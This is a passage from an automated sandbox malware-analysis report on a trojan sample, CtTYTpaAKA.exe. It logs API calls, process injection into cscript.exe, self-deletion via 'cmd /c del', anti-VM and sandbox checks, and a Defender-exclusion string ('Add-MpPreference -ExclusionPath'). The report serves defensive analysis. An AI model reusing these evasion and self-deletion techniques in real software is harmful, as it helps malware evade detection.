          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A50 NtCreateFile,LdrInitializeThunk,10_2_04779A50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779650 NtQueryValueKey,LdrInitializeThunk,10_2_04779650
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047796E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_047796E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047796D0 NtCreateKey,LdrInitializeThunk,10_2_047796D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779710 NtQueryInformationToken,LdrInitializeThunk,10_2_04779710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779FE0 NtCreateMutant,LdrInitializeThunk,10_2_04779FE0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779780 NtMapViewOfSection,LdrInitializeThunk,10_2_04779780
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477B040 NtSuspendThread,10_2_0477B040
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779820 NtEnumerateKey,10_2_04779820
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047798F0 NtReadVirtualMemory,10_2_047798F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047798A0 NtWriteVirtualMemory,10_2_047798A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779560 NtWriteFile,10_2_04779560
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779950 NtQueueApcThread,10_2_04779950
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477AD30 NtSetContextThread,10_2_0477AD30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779520 NtWaitForSingleObject,10_2_04779520
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047795F0 NtQueryInformationFile,10_2_047795F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047799D0 NtCreateProcessEx,10_2_047799D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779670 NtQueryInformationProcess,10_2_04779670
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A20 NtResumeThread,10_2_04779A20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779610 NtEnumerateValueKey,10_2_04779610
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A10 NtQuerySection,10_2_04779A10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A00 NtProtectVirtualMemory,10_2_04779A00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779A80 NtOpenDirectoryObject,10_2_04779A80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779770 NtSetInformationFile,10_2_04779770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477A770 NtOpenThread,10_2_0477A770
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779760 NtOpenProcess,10_2_04779760
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779730 NtQueryVirtualMemory,10_2_04779730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477A710 NtOpenProcessToken,10_2_0477A710
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779B00 NtSetValueKey,10_2_04779B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0477A3B0 NtGetContextThread,10_2_0477A3B0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047797A0 NtUnmapViewOfSection,10_2_047797A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001685F0 NtCreateFile,10_2_001685F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001686A0 NtReadFile,10_2_001686A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00168720 NtClose,10_2_00168720
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001687D0 NtAllocateVirtualMemory,10_2_001687D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001685EB NtCreateFile,10_2_001685EB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016871A NtClose,10_2_0016871A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_001687CA NtAllocateVirtualMemory,10_2_001687CA
          Source: CtTYTpaAKA.exe, 00000002.00000000.286061314.0000000000690000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBinaryArrayTypeEn.exe< vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTaskNode.dll4 vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exe, 00000005.00000002.354095072.00000000005C0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBinaryArrayTypeEn.exe< vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exe, 00000005.00000002.354643605.000000000109F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exeBinary or memory string: OriginalFilenameBinaryArrayTypeEn.exe< vs CtTYTpaAKA.exe
          Source: CtTYTpaAKA.exeVirustotal: Detection: 13%
          Source: CtTYTpaAKA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\CtTYTpaAKA.exe 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess created: C:\Users\user\Desktop\CtTYTpaAKA.exe C:\Users\user\Desktop\CtTYTpaAKA.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeProcess created: C:\Users\user\Desktop\CtTYTpaAKA.exe C:\Users\user\Desktop\CtTYTpaAKA.exeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CtTYTpaAKA.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@12/9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: CtTYTpaAKA.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4816:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: CtTYTpaAKA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: CtTYTpaAKA.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CtTYTpaAKA.exe, 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: CtTYTpaAKA.exe, cscript.exe
          Source: Binary string: cscript.pdb source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmp

          Data Obfuscation:

          .NET source code contains potential unpacker
          Source: CtTYTpaAKA.exe, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.0.CtTYTpaAKA.exe.610000.0.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 2.2.CtTYTpaAKA.exe.610000.0.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.2.CtTYTpaAKA.exe.540000.1.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.0.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.3.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.2.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.9.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.5.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.1.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 5.0.CtTYTpaAKA.exe.540000.7.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_0041B832 push eax; ret 5_2_0041B838
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FFD0D1 push ecx; ret 5_2_00FFD0E4
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_0478D0D1 push ecx; ret 10_2_0478D0E4
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_0016B832 push eax; ret 10_2_0016B838
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_0016B83B push eax; ret 10_2_0016B8A2
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_0016B89C push eax; ret 10_2_0016B8A2
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_0016B7E5 push eax; ret 10_2_0016B838

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\cscript.exe Process created: /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
          Source: C:\Windows\SysWOW64\cscript.exe Process created: /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: 2.2.CtTYTpaAKA.exe.29ed0e0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: CtTYTpaAKA.exe PID: 7140, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000000158614 second address: 000000000015861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 00000000001589AE second address: 00000000001589B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe TID: 7144 Thread sleep time: -35433s >= -30000s
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe TID: 3212 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5684 Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6812 Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cscript.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Thread delayed: delay time: 35433
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Thread delayed: delay time: 922337203685477
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000007.00000000.324192156.00000000089CC000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000000.338668394.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.320927407.0000000008778000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000007.00000000.301421655.00000000067C2000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.338668394.00000000086C9000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000007.00000000.301421655.00000000067C2000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000007.00000000.338668394.00000000086C9000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: CtTYTpaAKA.exe, 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Process token adjusted: Debug
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FA58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_01078D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_0102A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_0106E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FDF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FDF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_01023540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FE90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FD20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FA9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_010269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_010705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_010705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FC0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FDA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_010251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010251BE mov eax, dword ptr fs:[00000030h]5_2_010251BE
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010251BE mov eax, dword ptr fs:[00000030h]5_2_010251BE
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010251BE mov eax, dword ptr fs:[00000030h]5_2_010251BE
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]5_2_01026DC9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]5_2_01026DC9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]5_2_01026DC9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov ecx, dword ptr fs:[00000030h]5_2_01026DC9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]5_2_01026DC9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01026DC9 mov eax, dword ptr fs:[00000030h]5_2_01026DC9
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]5_2_00FD002D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]5_2_00FD002D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]5_2_00FD002D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]5_2_00FD002D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FD002D mov eax, dword ptr fs:[00000030h]5_2_00FD002D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBB02A mov eax, dword ptr fs:[00000030h]5_2_00FBB02A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBB02A mov eax, dword ptr fs:[00000030h]5_2_00FBB02A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBB02A mov eax, dword ptr fs:[00000030h]5_2_00FBB02A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FBB02A mov eax, dword ptr fs:[00000030h]5_2_00FBB02A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FDBC2C mov eax, dword ptr fs:[00000030h]5_2_00FDBC2C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106FDE2 mov eax, dword ptr fs:[00000030h]5_2_0106FDE2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106FDE2 mov eax, dword ptr fs:[00000030h]5_2_0106FDE2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106FDE2 mov eax, dword ptr fs:[00000030h]5_2_0106FDE2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0106FDE2 mov eax, dword ptr fs:[00000030h]5_2_0106FDE2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_010341E8 mov eax, dword ptr fs:[00000030h]5_2_010341E8
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01058DF1 mov eax, dword ptr fs:[00000030h]5_2_01058DF1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_01061C06 mov eax, dword ptr fs:[00000030h]5_2_01061C06
